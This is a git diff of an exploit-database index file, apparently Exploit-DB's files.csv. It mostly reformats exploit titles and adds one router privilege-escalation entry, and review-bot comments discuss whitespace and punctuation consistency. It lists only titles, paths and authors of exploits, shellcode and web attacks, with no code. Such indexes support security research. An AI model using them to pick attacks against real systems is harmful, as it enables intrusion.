diff --git a/files.csv b/files.csv
index f1bbd2cea..02034108b 100644
--- a/files.csv
+++ b/files.csv
@@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port
 28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0
 28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
 40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
-28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
+28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0
 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0
 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0
@@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port
 19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0
 19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0
 19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0
-19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
+19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
 19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
 19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0
@@ -9121,7 +9121,7 @@ id,file,description,date,author,platform,type,port
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
-40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
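Review bot: The removed and added lines for entry 40956 read as byte-identical in this hunk, so the actual change is presumably whitespace or a non-printing character (trailing space, CRLF, or a stray control character) that this rendering hides; the same applies to the hunks for 6155, 31699, 32489, 33873, 37969, 40234, 9151, 25299, 26488, 32523, 32766, 33122, 35989, 36001, 36493, 36848, 37488, 37544 and 37945. Worth confirming with `git diff --ws-error-highlight=all` (or `git show | cat -A`) that each of these is the intended normalization rather than an accidental encoding change inside the quoted description field, since that column is what gets published. If the goal is trailing-whitespace cleanup, a single pass over the whole file would be easier to review than twenty scattered one-line hunks.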
@@ -9841,7 +9841,7 @@ id,file,description,date,author,platform,type,port
 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
 2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
-2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
+2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049
@@ -10303,7 +10303,7 @@ id,file,description,date,author,platform,type,port
 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Exploit",2008-07-25,"Marc Bevand",multiple,remote,0
 6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0
 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0
-6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0
+6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0
 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0
 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0
 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0
@@ -10365,7 +10365,7 @@ id,file,description,date,author,platform,type,port
 6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0
 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0
 6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote,0
-6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
+6880,platforms/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0
 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0
 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0
@@ -10942,7 +10942,7 @@ id,file,description,date,author,platform,type,port
 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0
 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
 15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
-15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
+15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
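Review bot: The new description for 15357 joins the quoted command names without spaces, `'RETR'/'DELE'/'RMD'`, while the other renames in this same commit and the surrounding context use the spaced form (`'Systour' / 'OutOfBox'` for 19356, `'document.write' / 'appendChild'` in the context line just above). Since these descriptions are the searchable title column, a consistent separator matters more than the exact choice; I would make it `"Home FTP Server 1.11.1.149 - 'RETR' / 'DELE' / 'RMD' Directory Traversal"` to match.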
@@ -12305,7 +12305,7 @@ id,file,description,date,author,platform,type,port
 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
-20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
+20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
 20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
@@ -14470,7 +14470,7 @@ id,file,description,date,author,platform,type,port
 31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting",2008-03-12,felix,windows,remote,0
 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,linux,remote,0
 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0
-31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",windows,remote,0
+31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",windows,remote,0
 31405,platforms/windows/remote/31405.c,"XnView 1.92.1 - Command-Line Arguments Buffer Overflow",2014-02-05,"Sylvain THUAL",windows,remote,0
 31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
 31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0
@@ -14608,7 +14608,7 @@ id,file,description,date,author,platform,type,port
 32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0
 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0
 32564,platforms/multiple/remote/32564.txt,"XWork < 2.0.11.2 - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0
-32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",windows,remote,0
+32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",windows,remote,0
 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0
 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0
 32515,platforms/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443
@@ -14875,7 +14875,7 @@ id,file,description,date,author,platform,type,port
 33865,platforms/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007
 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0
 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0
-33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",multiple,remote,0
+33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",multiple,remote,0
 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote,0
 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0
 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0
@@ -15392,7 +15392,7 @@ id,file,description,date,author,platform,type,port
 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
 37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0
-37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote,0
+37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote,0
 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Buffer Overflow",2015-08-29,Koby,windows,remote,21
@@ -15659,7 +15659,7 @@ id,file,description,date,author,platform,type,port
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0
-40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote,0
+40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote,0
 40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0
 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
@@ -15930,6 +15930,7 @@ id,file,description,date,author,platform,type,port
 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
 43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
+43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -20548,7 +20549,7 @@ id,file,description,date,author,platform,type,port
 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0
 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0
 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps,0
-6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0
+6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0
 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
@@ -22082,7 +22083,7 @@ id,file,description,date,author,platform,type,port
 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0
 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0
-9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0
+9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0
 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0
 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0
 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0
@@ -28181,7 +28182,7 @@ id,file,description,date,author,platform,type,port
 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0
 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0
 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80
-25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,php,webapps,0
+25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,php,webapps,0
 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0
 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0
 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
@@ -29072,7 +29073,7 @@ id,file,description,date,author,platform,type,port
 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0
 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0
 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - 'frameset.htm?sap-syscmd' Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0
-26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",php,webapps,0
+26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",php,webapps,0
 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0
 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080
 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0
@@ -33193,7 +33194,7 @@ id,file,description,date,author,platform,type,port
 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,php,webapps,0
-32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,php,webapps,0
+32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,php,webapps,0
 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0
 32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps,0
 32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0
@@ -33353,7 +33354,7 @@ id,file,description,date,author,platform,type,port
 32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0
 32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0
 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0
-32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,php,webapps,0
+32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,php,webapps,0
 32767,platforms/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps,0
 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps,0
 32770,platforms/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Cross-Site Scripting Multiple Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
@@ -33524,7 +33525,7 @@ id,file,description,date,author,platform,type,port
 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
-33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",php,webapps,0
+33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",php,webapps,0
 33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Cross-Site Scripting Multiple Vulnerabilities",2009-06-29,Moudi,php,webapps,0
@@ -35162,7 +35163,7 @@ id,file,description,date,author,platform,type,port
 36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",php,webapps,0
 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'tasks.php?selected[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
-35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0
+35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0
 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Cross-Site Scripting Multiple Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0
 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80
